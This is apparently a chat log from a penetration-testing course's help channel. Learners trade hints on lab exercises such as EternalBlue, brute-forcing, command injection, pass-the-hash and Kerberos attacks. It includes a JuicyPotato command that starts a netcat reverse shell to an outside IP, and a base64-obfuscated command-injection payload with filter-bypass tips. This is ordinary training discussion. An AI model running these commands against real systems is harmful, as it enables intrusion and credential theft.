PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5000/tcp open  upnp
supple patio
#

I mean not the simple meterpreter, but with x64

sterile epoch
#

ok so I need to use the encoding concept too

#

I will do so now

supple patio
#

windows/x64/meterpreter/reverse_tcp

#

Did you try with this payload? Because sometimes the default payload doesn't work

sterile epoch
#

yes

#

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

arctic junco
#

What is the exact question you are stuck on?

sterile epoch
#

I am still a little fuzzy with the payload encoding concept and I am stuck on both the questions in the meterpreter section

supple patio
supple patio
supple patio
#

What's the target there?

#

Also you're using there default payload "windows/meterpreter/reverse_tcp" not the "windows/x64/meterpreter/reverse_tcp"

sterile epoch
#

automatic

supple patio
#

Iirc there's x64 windows

supple patio
#

In my case this one windows/x64/meterpreter/reverse_tcp worked completely fine

sly dome
#

he is using it

supple patio
sly dome
#

i did not do that module i cant help xD

#

(totally avoiding it)

supple patio
#

I mean, it was the same, output in my case, but I configured the metasploit specifically for x64

#

It worked

sterile epoch
supple patio
#

Of course it's confusing

sly dome
sterile epoch
#

ohh

sterile epoch
sly dome
#

i want to do other modules first just that

supple patio
sterile epoch
#

dunno what I am doing wrong

supple patio
sterile epoch
#

I did a scan found out smb brain clicked to eternal blue cuz of ties to metasploit in prev modules and no other services are vul. I then filled the rhost and lhost. and ran it its giving error and the I checked the payload windows/x64/meterpreter/reverse_tcp

#

something wrong in the flow?

supple patio
sterile epoch
#

thanks

supple patio
#

mate, you had to check up that http port

sterile epoch
#

there is one Microsoft IIS httpd 10.0 service running

supple patio
#

you will see that http port with better response

sterile epoch
#

I did

supple patio
#

great

#

enumerate it

sterile epoch
#

I tried looking for httpd 10.0

#

Nothing good came of it

sly dome
#

probably the exploit is in the service running in the web server

supple patio
sly dome
#

httpd 10.0 is nothing

#

to search about

sterile epoch
#

Yes i agree nothing popped

sly dome
#

ofc

#

since it is nothing

#

just nmap fingerprinting it

sterile epoch
sly dome
#

but if you take a look at the web service with a browser you will see what is running

supple patio
sly dome
#

and search for that

#

i dont know if u have to run nmap in this case

supple patio
sly dome
#

if you dont know if port 80 is open yea run it

supple patio
sly dome
#

kk

supple patio
sterile epoch
#

I tried the browser but nothing came maybe it was the old target i will give it another try today later

sly dome
#

as i said i did not do the module, im just pointing out that IIS httpd 10.0 is not something to search for exploits generally

sterile epoch
supple patio
sterile epoch
#

I will update you once I do it

sterile epoch
thorn urchin
sly dome
#

HAHAHAHA

thorn urchin
#

Im completely serious

sly dome
#

this isnt CVE find and exploit

#

nah i just laugh because OSCP is super CVE involved

thorn urchin
#

yeah

sly dome
#

and i dont agree with that type of exam

#

but totally a super good cert to have

#

the 24h time limit is for sure difficult

supple patio
sly dome
#

yes xD

#

w.e. most people need it to find a job

#

one cert i want from OffSec is OSEP, i find it very interesting

#

but off-topic

supple patio
#

OSWE also seems interesting

sturdy otter
#

any hints? I think hydra takes already to long for an module question. But it states create the mutated wordlist from the files in the ZIP. I took the rules and the pw-list from the Zip. Not much more combinations left. Maybe I overlook something. Ty!

iron plaza
tame ivy
tame ivy
sturdy otter
#

thanks for your help already. I have msf running in parallel for smb but so far still running without any findings

sturdy otter
sturdy otter
sturdy otter
#

yeah worked, thanks! This one needs some patience. I'm a little afraid of the exam now. In the end losing too much time because something doesn't fit with the list while bruteforcing. Better watch twice here, or try multiple lists in parallel ๐Ÿ˜„ Thanks again!

arctic junco
#
sterile epoch
blazing pelican
# fathom pendant It's an intro module so it's gonna be simple

SO ! I finally got this file, I understood after your help that I just had to change the ||FILEPATH|| parameter, yet I wasted another 30 minutes trying to predict where the flag was in the architecture by trying various /simple-backup/ combinations as I thought that the text on the site was a clue to find the flag, despite its path being given in the htb question in the first place ๐Ÿคฆโ€โ™‚๏ธ I never felt so relieved / happy and mad to myself at the same time before ahahah, thanks for the help anyway I might have to learn how to not overcomplicate everything ^^ thanks for your help too @acoustic owl

fathom pendant
acoustic owl
primal mesa
#

hi, sorry i just started my cyber journey. how did you know we are only supposed to scan 53 NotLikeThis

fathom pendant
fathom pendant
onyx arch
#

Hi, I have question for the Windows Privilege Escalation Skill assessment module, I got a rev shell and currently working for privesc, I have tried to use printspoofer, roguepotato, and juicy potato, none of it worked. Finally I discover to use CLSID which giving me this output:

PS C:\windows\temp> ./juicypotato.exe -t * -l 1337 -p "C:\windows\temp\nc.exe 10.10.14.206 1236 -e powershell" -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
./juicypotato.exe -t * -l 1337 -p "C:\windows\temp\nc.exe 10.10.14.206 1236 -e powershell" -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
Testing {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 1337
......
[+] authresult 0
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM

[-] CreateProcessWithTokenW Failed to create proc: 2

[-] CreateProcessAsUser Failed to create proc: 2
[+] calling 0x000000000088ce08

Did I miss something? I haven't got any information on google regarding the create proc:2

undone narwhal
onyx arch
#

Am I on the right track? or there's something that I missed?

acoustic owl
onyx arch
#

Yes, I already choose the CLSIDs from the systeminfo output, where I get the list of CLSID from the github tools page, but still I didn't get any reverse shell, it end up showing "Failed to create proc: 2" message

#

Is the problem because I using netcat shell not the RDP?

acoustic owl
supple patio
onyx arch
tame ivy
#

Module:Password Attacks
Section:Pass the Hash (PtH)
tried cme smb -sam to dump hashes, but there is no david, also tried with mimikatz and also there is no hash for david user, could someone help me pls?

hallow kiln
tame ivy
hallow kiln
tame ivy
#

well i reread all module, and there is no other things, well i tried also to dump ndst but there is nothing, here check it, (at screenshot u can see david thing but this hash is not working)

tough crystal
#

Hello, guys i am new here I am having trouble in Comamand Injection Module in the Skill Assesmnet part you see I am getting the error Error while moving: mv: โ€˜/var/www/html/files/2561732172.txtโ€™ and โ€˜/var/www/html/files/2561732172.txtโ€™ are the same file. I am creating the base 64 unecoded version
echo -n 'cat ${PATH:0:1}flag.txt' | base64
this is the whole thing
**?to=&bash<<<$(base64 (%09) -d<<<Y2F0IC9mbGFnLnR4dA==)&from=2561732172.txt&finish=1&move=1 **where am I making a mistake

sly dome
tame ivy
sly dome
#

the command is not in the section but a lot of commands are not even in the path, you are supposed to investigate stuff

sly dome
tough crystal
sly dome
#

try harder

hallow kiln
#

But research is expected regardless

tough crystal
sly dome
tough crystal
#

yee moral support

sly dome
#

this means you are getting something blacklisted

#

try to bypass it

tough crystal
#

injection point is bypassed

#

i shoudl be getting the malicuis request denied if i had

#

a problem with that

sly dome
#

can you do an ls?

#

or whoami

fathom pendant
tame ivy
tough crystal
sly dome
#

bypass space and bypass slash

tender lake
#

I'm stuck on the Last question of Active Directory Enumeration and Attack, I can't seem to perform the DCSync with the creds for t***. I have tried to do this from MS01 with secretsdump.exe.

Can anyone assist me?

tough crystal
#

i have done that 100 times xd

sly dome
#

dm me your payload

upper ruin
#

Wsg y'all. I am at Vuln Assessment the Nexus Skill thingy.
I do the scan, for some reason it takes seconds. I configure the target and the authentication , but when I download the report it's all blank. I did a scan after I SSHed to the generated 10.129 - target. The target on nessus was 172.16.16.100.
What am I doing wrong?

#

What's the idea of the spawned target system if I am already given an IP. I just don't get the logic.

#

Wait bruh, follow me through. I get into the target with SSH, run the nessus start command on the enemy target , from where I log into nessus with the given credentials, which I enter afterwards in the configuration?

sly dome
#

you dont have to run any scan

#

read thoroughly the content of the section

#

the spawned ip has running the nessus dashboard

#

wait for it a couple of minutes to set up

#

its running under https in the port taught in the module

#

ssh connection isnโ€™t necessary either

upper ruin
#

what the fuck have I been doing.

#

Aight, will re-read it all.

sly dome
#

i suggest you to do the skill assessment while reading it

#

because it guides you

fathom pendant
upper ruin
#

Will do, fellas.

neat sky
#

use crackmapexec and instead of -p use -H

keen compass
#

anybody available to talk about the way they solved LINUX PRIVILEGE ESCALATION > Escaping Restricted Shells > Use different approaches to escape the restricted shell and read the flag.txt file ?
I solved it using|| ssh xxxx -t "sh" ||and wonder how other did it ?

tame ivy
#

Is it okay to use mutated password list in Password Attacks Skills Assessments? i dont need rockyou.txt right?

hallow kiln
#

As soon as you create the list, it's used throughout the entire module

#

If something doesn't crack with it, only then you switch to rockyou

digital junco
#

Hello guys

#

can someone help me with the last lab of the nmap module? (the Hard one)

digital junco
#

yup i alredy use --source-port 53

fathom pendant
#

Are you doing a full port scan

digital junco
#

-p- yes sir

fathom pendant
digital junco
#

-sU yes sir

fathom pendant
#

Have you tried tcp?

digital junco
#

-sA and -sT too

fathom pendant
#

Weird but if you mostly follow the ids/ips evasion section under proxying it'll be more helpful

#

Oh right it's the Syn scan

digital junco
#

-sS?

#

but this one is the default with root account

#

I'm confused about the question in it's self because it's seems to me that they are talking about the Dns

tame ivy
#

after that listen with nc -nv(found a strange port or anything like this)

#

and just wait for banner, it may take 1 minute

digital junco
#

humm..

tame ivy
#

also u can try -Pn and -n

digital junco
#

i'm stuck at this lol

tame ivy
#

just as i said, he must use nc -nv <ip> <port> after nmap scan, to grap a banner

sly dome
#

netcat also has the source port flag

#

-p

cedar void
sly dome
#

with netexec/crackmapexec for example

cedar void
#

I now see that Impacket is also a solutio

digital junco
sly dome
#

53?

#

the firewall accepts inbound connections if they come from port 53 for DNS resolution

#

itโ€™s explained in the section

tame ivy
#

guys im trying to download a file with smbclient but file is too big, how to download it with crackmapexec or when mounting a drive to /mnt how to specify user?

tame ivy
fathom pendant
sly dome
#

let me check

outer thorn
sly dome
outer thorn
# sly dome unrelated to the question

They canโ€™t access the box to change the things they need in the registry because of xfreerdp, so itโ€™s definitely related if you use remmina to access the box

restive hound
#

Okay, good morning everyone. I am stuck on the Skills assesment of INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC. I have been reading web pages all morning and trying my best to build this KQL query to search for "Lateral Tool Transfer". Here is my Query:||(event.category: "command" OR event.category: "file" OR event.category: "named pipe" OR event.category: "network" OR event.category: "process") AND
(event.action: "execution" OR event.action: "creation" OR event.action: "modification" OR event.action: "connection" OR event.action: "access" OR event.action: "start") AND
user.name: "r*"||

sly dome
outer thorn
sly dome
#

no they wont

#

re-read the section

sly dome
#

to allow PtH you need the registry key

outer thorn
sly dome
#

๐Ÿ‘

sly dome
#

without problems

fathom pendant
#

It literally explains in the section that you need to use a command using evil-winrm

tame ivy
sly dome
#

yes try

#

i did on my Parrot

#

idk!

tulip coral
#

Good Morning im having issues-WINDOWS PRIVILEGE ESCALATION-DNSAdmins can anyone give me a nudge

acoustic owl
sly dome
#

you can specify the username and password with -o

#

remember installing cifs-utils

fathom pendant
#

This linked article works really well

sly dome
#

he isnt at that point yet !

#

he is trying to get the .vhd

fathom pendant
#

Yes

sly dome
#

to crack it o.O

fathom pendant
fathom pendant
sly dome
#

personally used Windows, full compatibility with vhd files

fathom pendant
#

Honestly the second link works really well

sly dome
#

lately im using Windows a lot

#

to complete the modules

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

sly dome
#

getting used to work from a Windows

#

very cool for Active Directory stuff

fathom pendant
#

I was able to follow the article step-by-step and made it work first try

#

Well yeah

#

AD and windows makes sense

sly dome
#

im in the AD module haha recommended

#

xct style ๐Ÿ˜Ž

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

sly dome
#

i love when he completes machines from his Windows host

fathom pendant
#

Cool (don't know and don't care)

sly dome
#

you have to know xct come on

fathom pendant
#

I really don't

sly dome
#

best HTB player ever i think

#

CEO of vulnlab

#

truly difficult CTF machines platform

#

i recommend it a lot, but you need some experience

analog dock
#

Szymex was the best HTB player afaik

sly dome
#

historically i mean

#

xct still owns top 1

hallow kiln
sly dome
#

i have never seen another top 1

fathom pendant
#

This is straying off topic

analog dock
#

Szymex doesnโ€™t do boxes anymore

sly dome
#

yea off-topic sorry !

#

my bad

analog dock
fathom pendant
analog dock
sly dome
#

git gud all

hallow kiln
#

there's good, and then there's szymex and xct, all of academy won't bring us to that level lol

sly dome
#

hahah we will try our best

#

CTF's also need that big brain part to be good at them

hallow kiln
#

I'm fine with my two braincells, I just want the skills to get a job, not CTF fame

sly dome
#

understandable

#

at the end, money to eat is the important part ๐Ÿ˜†

cedar void
#

"Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account? "

I don't understand why they would want me to use the mimikatz tool to find David's rca hash when the use of this tool requires that you know an NTLM or RC4 hash of the user in order to run this tool

sly dome
#

you do not

fathom pendant
cedar void
#

So I can use the credentials of the user Administrator

fathom pendant
#

Thats what it explicitly tells you

#

As the credentials are directly above the question

#

Note its a hash, not a password

cedar void
#

Oh I thought that was just to RDP into the target machine.

#

Nevermind, I think I figured it out

naive turtle
#

Hey all, i've been stuck in the assessment for Windows Event logs & Finding Evil..

Specifically for: * By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe*

Just want to know if anyone has any tips without giving away too much.. i've hit a wall at the moment

iron plaza
#

Need to dm someone regarding Unconstrained Delegation - Computers in the Kerberos Attacks (module/25/section/142) as saying anything here will be a spoiler

naive wadi
#

Just put in spoiler tags so no one sees? Enclose in ||

acoustic owl
cedar void
#

Now that I am on he C:\Windows\system32 machine do I need to execute another pass the hash command or would one do just fine?

I asked because I tried finding the \DC01\david.txt directory with no luck

"Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. "

fathom pendant
#

Yes youd need to pth with David

#

But should be fine after

tulip coral
#

Good Afternoon the following commands do not appear to be working in **Windows Priv DNS admin ** Am i missing something ?

hazy grotto
#

Trying to figure out how to convert a decimal into RID which is hex.

Tried using magic chef but the value doesn't look right. Any suggestions?

upper ruin
fickle fiber
#

question about reporting and CVSS, do you score the same an SQL that only allows data exfiltration vs one that would let you upload a web shell and perform RCE via that web shell?

fathom pendant
pulsar willow
pulsar willow
fathom pendant
fathom pendant
hallow kiln
#

those are... words

hot heart
#

This man's autocorrect is working overtime^^^

iron plaza
#

help me understand something that wasn't clear in the Kerberos Attack- Unconstrained Delegation - Computers section ... I have received the TGT for DC01$ through SpoolSample and renewed the ticket to load it on the memory... do I still need a domain admin to access the directory in \DC01\C$?

fathom pendant
#

Thank you blessed mods

fathom pendant
#

You can probably use the DC01$ ticket though

upper ruin
hot heart
upper ruin
#

In both cases, he is too advanced for us.

hot heart
upper ruin
#

He is alt acc of an admin.

river aspen
#

how can I fuzz for html files with Burp Suite Intruder? I used suffix ".html" in payload processing, but had no match.

west rampart
#

Burp free?

river aspen
#

no

#

pro

west rampart
#

Gib license

#

And I thank you

#

Which module you're on?

river aspen
#

"using web proxies" "burp intruder"

upper ruin
#

Is there even a module that will teach us BurpSuite?

west rampart
#

Isn't it showing how u fuzz?

#

I could probably help but I'm on the toilet

river aspen
#

it is showing only, how to get a match for ip:port /admin , but for the flag I need a html file.

west rampart
#

Ah

#

Dm me and we figure out together

river aspen
#

thanks

slate shell
#

from the footprinting lab how did you guys manage to enumerate the snmp cuz its refusing

supple patio
graceful cobalt
#

hi all .. I've started the ACTIVE DIRECTORY ENUMERATION & ATTACKS module and in the first question i'm stuck:

While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} )

I can't find this flag at all looking at the public DNS records for inlanefreights.com. Any tips ?

supple patio
#

maybe you mistyped something?

graceful cobalt
#

lol nevermind .. it worked now .. but i'm on the academy VPN

#

is that a requirement ?

supple patio
#

it's public domain

graceful cobalt
#

probably something weird with my internet or something

graceful cobalt
#

doing a dig in any records wasn't giving anything

#

you're right .. i copied from the question and got it wrong

#

"While looking at inlanefreights public records;"

#

feel like a tool now

#

๐Ÿ˜‚

slate shell
#

i just need a way to use dictionary to find the community string

fathom pendant
slate shell
fathom pendant
#

The default wordlist or one in SecList does work share a screenshot of your output and I can almost guarantee you overlooked the output

fathom pendant
slate shell
sly dome
#

Module AD Enum & Attacks:

It states VPN access into their internal network (a bit limiting because we will not be able to perform certain attacks such as LLMNR/NBT-NS Poisoning).

But one day in #hacker-lounge someone claimed it was possible. What is the consensus about it?

tawdry vapor
#

hello guys, someone can help me with Bleeding Edge Vulnerabilities?? Active Directory Enumeration & Attacks module

#

this error apear

supple patio
fathom pendant
#

Also are you sure that cve is written for python3? (Haven't finished this module so I'm not sure)

iron plaza
# fathom pendant Yes because it's a domain share

ok i monitored for other users using rubeus and only got two domain users and when i load their TGT through asking for one using NT hash I am unable to access the domain directory ... i m not getting a domain admin user in the monitor. Not sure where I am messing up.

fathom pendant
tawdry vapor
fathom pendant
supple patio
#

also, did you install cube0x0's impacket?

#

it's required to make this CVE iirc

sly dome
iron plaza
#

@hallow kiln mate if you're available, I would like to dm you regarding kerberos attacks

sly dome
#

is this an erratum?

iron plaza
sly dome
#

let me grep real quick xD

#

ah yea in 3389 o.O

#

2 different certificates

#

one from the CA

#

and the RDP one

#

makes sense

iron plaza
#

yea i never understood that and shoved it under things HTB didnt explain

sly dome
#

what is the commonName for the RDP certificate could be a better question

iron plaza
sly dome
#

wdym

iron plaza
sly dome
#

ah

#

indeed

#

"think out of the box"

austere sandal
#

if youre the box will you look at it

#

INSIDE

austere sandal
#

anime Leader ki

naive turtle
fiery berry
# tawdry vapor

go to the "/opt/" (pwnbox) directory there are some exploits you can use against the DC

hallow kiln
robust elk
#

how to solve this problem in Attacking Web Applications With FFUF "Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?" i tried ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https ://FUZZ.inlanefreight.com/ but ffuf kept sending errors

#

please if you can help i would be so thankful

#

i also tried to add the website ip to /etc/hosts but it also didnt work

#

and pinging the website just results in 100% packet loss

#

tried with http but it didnt work

#

yeah

#

i did with pwnbox and my vm

#

what is pm